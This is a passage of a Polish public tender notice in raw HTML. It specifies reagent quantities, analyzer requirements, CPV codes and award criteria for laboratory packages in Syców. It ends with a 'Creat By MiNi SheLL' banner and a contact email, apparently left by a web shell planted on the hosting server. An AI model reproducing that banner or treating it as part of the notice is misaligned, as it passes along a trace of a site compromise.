W przypadku materiałów kontrolnych do Białka w moczu (poz. 26 zestawienia) Wykonawca uwzględni wykonywanie kontroli 2 razy w tygodniu 
na 2 poziomach.
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
3. Materiały zużywalne i eksploatacyjne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu.  Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
Wykonawca pokrywa koszt podłączenia oferowanych analizatorów z laboratoryjnym systemem informatycznym e-lab, który zainstalowany jest 
w laboratoriach Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.90.00-9, 38.43.45.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena parametrów technicznych analizatora - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - dostawa odczynników i materiałów zużywalnych do badań immunologicznych wraz z dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warunki graniczne  wymagane przez Zamawiającego:
Wieloparametrowy, automatyczny analizator immunologiczny
Krzywa kalibracyjna w postaci kodu kreskowego dołączona do każdego opakowania
Optymalizacja kosztów - brak strat finansowych w przypadku wykonywania pojedynczego oznaczenia
Analizator bezigłowy lub jednorazowe końcówki dozujące
Stała gotowość do pracy - bez konieczności wykonywania procedury start Up
Wymagana w metodyce ilość rekalibracji i kontroli - nie częściej niż co 14 dni .
Bezpłatna gwarancja  /przeprowadzenie  przeglądów aparatu   w czasie trwania umowy
Wymagane podłączenie do funkcjonującej w Laboratorium sieci LIS

TSH 3 gen - ilość: 6 000
Ft4 - ilość: 	600
Ft3 - ilość: 	400
TPSA - ilość: 1200
Hbs Ag ultraczuły - ilość: 500
D-Dimery - ilość: 500
Trwałość odczynnika po otwarciu na pokładzie analizatora
Do końca daty ważności podanej na opakowaniu
Odczynniki do wykonywania oznaczeń gotowe do użycia, prekalibrowane fabrycznie.
Zestawy odczynników, których otwarcie nie skraca terminu ważności opisanego na zestawie  wynoszącego minimum 4 miesiące
Do oferty należy dołączyć metodyki oznaczeń  i/lub inne materiały opisujące m.in. wymaganą procedurę kalibracji i kontroli analizatora
Wykonawca winien rozszerzyć formularz o kolejne pozycje aby wpisać i wycenić wszystkie potrzebne  materiały eksploatacyjne oraz zużywalne dla podanej ilości badań zgodnie z procedurą zawartą  w metodyce  oznaczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.62.00-7, 38.43.45.80-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - dostawa odczynników i materiałów zużywalnych do oznaczania elektrolitów wraz z dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PARAMETRY GRANICZNE ANALIZATORA
Możliwość oznaczania: Na , K , Cl  we krwi pełnej, surowicy osoczu lub moczu
Kalibracja automatyczna lub na żądanie
Odczynniki kalibracyjne i pojemnik na ścieki w zamkniętym pakiecie
Żywotność pakietu po instalacji w aparacie minimum 60 dni
Bezobsługowe elektrody  
Objętość próbki surowicy maksymalnie 55 ?l
Detektor pęcherzyków powietrza
Czas pomiaru do 35 sekund
Oprogramowanie analizatora i instrukcja obsługi w języku polskim
System kontroli jakości - na 3 poziomach
Czytnik barkodów w zestawie z aparatem
Rok produkcji aparatu - nie starszy niż 2010
Udział w statystycznej kontroli jakości STANDLAB na koszt Wykonawcy
Wymagane podłączenie do funkcjonującej w Laboratorium sieci LIS

1. Odczynniki
Sód - ilość: 19 000 ozn
Potas	- ilość: 19 000 ozn
Chlorki - ilość: 19 000 ozn
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania.
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne.
2. Materiały zużywalne
3. Materiały kontrolne i kalibratory
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.62.00-7, 38.43.45.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych wraz z dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warunki bezwzględnie wymagane przez Zamawiającego dotyczące analizatora biochemicznego:
Wieloparametrowy analizator biochemiczny,
Nie starszy niż 2010r, wyklucza się analizator demonstracyjny .
Analizatory typu bench top do postawienia na stole.
Analizator pracujący w systemie odczynnikowym i aplikacyjnym  całkowicie otwartym .
Wydajność części fotometrycznej  analizatora minimum  240 testów /godzinę .
Analizator pracujący z wykorzystaniem kuwet pomiarowych wielokrotnego użytku .
Kuwety myte  przez stację mycia kuwet zintegrowaną z analizatorem.
Analizator pracujący bez zewnętrznej stacji uzdatniania wody.
Małe  zużycie wody  nie więcej niż  4 l /godz. pracy analizatora
Oddzielanie ścieków skondensowanych (zakaźnych) od pozostałych .
Analizator pracujący  w zakresie dł. fali 340-800 nm.
Chłodzenie odczynników na pokładzie analizatora  niezależnie od temp. otoczenia .
Rotor  próbkowy  analizatora :  minimum   50 pozycji 
Rotor odczynnikowy  analizatora : minimum 35 pozycji dwuodczynnikowych  
Kuwety pomiarowe termostatowane do 37st.C bez łaźni wodnej.
Analizator wyposażony w zewnętrzną jednostkę sterującą : komputer zewnętrzny - oprogramowanie  Windows 2000, XP lub nowszy, zewnętrzny monitor  typu LCD , zewnętrzną drukarkę laserową , UPS
Możliwość oznaczania :  enzymów , substratów , białek specyficznych, monitorowanie leków.
Program kontroli jakości badań z liczbową  i graficzną prezentacją wyników - 
wykresy Levey -Jenningsa
Możliwość programowania próbek cito w dowolnym momencie pracy analizatora - nie mniej niż 5 pozycji cito, w rotorze próbkowym .
Mieszanie mieszaniny reakcyjnej bez ryzyka kontaminacji - mieszanie pneumatyczne2
Niezależny system pipetujący dla odczynników oraz dla próbek:
- dwie niezależne igły odczynnikowe
- niezależna igła próbkowa
Opcja  automatycznego  powtarzania analiz po przekroczeniu zakresu liniowości
Opcja automatycznego  rozcieńczania próbek
Możliwość barkodowej identyfikacji próbek i odczynników za pomocą wbudowanego w analizator czytnika kodów paskowych
Możliwość zastosowania próbki badanej w kubeczkach lub probówkach pierwotnych
Oprogramowanie analizatora  w języku polskim
Bezpłatny serwis w czasie trwania umowy
Materiały informacyjne z parametrami technicznymi oferowanego aparatu z których wynika spełnienie parametrów wymaganych dołączone do oferty przetargowej .
Udział w statystycznej kontroli jakości STANDLAB na koszt Wykonawcy
Wymagane podłączenie do funkcjonującej w Laboratorium sieci LIS
Oferowane urządzenie musi posiadać parametry techniczne nie gorsze niż wymagane przez   Zamawiającego oraz posiadać cechy użytkowe wymagane przez Zamawiającego.
Niespełnienie któregokolwiek z wymaganych parametrów - brak potwierdzenia TAK w kolumnie nr 3 lub brak opisu w kolumnie nr 4 spowoduje odrzucenie oferty.

1. odczynniki do analizatora biochemicznego 
Glukoza - ilość: 18 000
Cholesterol - ilość: 11 000
Cholesterol HDL(bezpośredni) - ilość: 10 000
Trójglicerydy - ilość: 10 000
Białko całkowite - ilość: 300
Bilirubina całkowita - ilość: 2 000
Mocznik - ilość: 8 000
Kreatynina - ilość: 16 000
Kwas moczowy - ilość: 5 000
Amylaza - ilość: 1000
Aminotransferaza asparaginowa - ilość: 5 500
Aminotransferaza alaninowa - ilość: 10 000
GGTP - ilość: 2 500
Fosfataza alkaiczna - ilość: 600
Wapń - ilość: 1000
Magnez - ilość: 1200
Białko w moczu - ilość: 1300
Żelazo - ilość: 2 800
CRP ultraczułe - ilość: 6 000
RF ilościowo - ilość: 900
ASO ilościowo - ilość: 600
Wszystkie odczynniki w opakowaniach umożliwiających ich bezpośrednie wstawienie na pokład analizatora bez konieczności ich przelewania poza analizatorem. 
W przypadku niepodzielności ilości testów w opakowaniu zaokrąglić w górę do pełnego opakowania.
Podane ilości opakowań z uwzględnieniem terminu trwałości na pokładzie analizatora po ich otwarciu. Instrukcje odczynnikowe wraz z aplikacjami na oferowany analizator w formie pisanej dołączone do oferty przetargowej.
Wszystkie odczynniki, kontrole, kalibratory muszą pochodzić od jednego producenta i być dedykowane do oferowane analizatora.
2. Kalibratory
W przypadku niepodzielności opakowań należy zaokrąglić do pełnego opakowania w górę.
Wszystkie odczynniki, kontrole, kalibratory muszą pochodzić od jednego producenta i być dedykowane do oferowanego analizatora.
Kalibratory w ilości umożliwiającej wykonanie ilościowe wszystkich parametrów wykazanych w tabeli nr 1 w okresie trwania umowy.
3. Surowice kontrolne
W przypadku niepodzielności opakowań należy zaokrąglić do pełnego opakowania w górę.
Wszystkie odczynniki, kontrole, kalibratory muszą pochodzić od jednego producenta i być dedykowane do oferowanego analizatora.
Kontrole w ilości umożliwiającej wykonanie ilościowe wszystkich parametrów wykazanych w tabeli nr 1 w okresie trwania umowy.
System prowadzenia kontroli jakości: codziennie na dwóch poziomach - normalnym i patologicznym.
4. Części zużywalne, płyny myjące, inne do analizatora biochemicznego.
W przypadku niepodzielności opakowań należy zaokrąglić do pełnego opakowania w górę.
Części zużywalne, płyny myjące, inne do analizatora biochemicznego w ilości umożliwiającej wykonanie ilościowe wszystkich parametrów wykazanych w tabeli nr 1 w okresie trwania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.62.00-7, 38.43.45.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com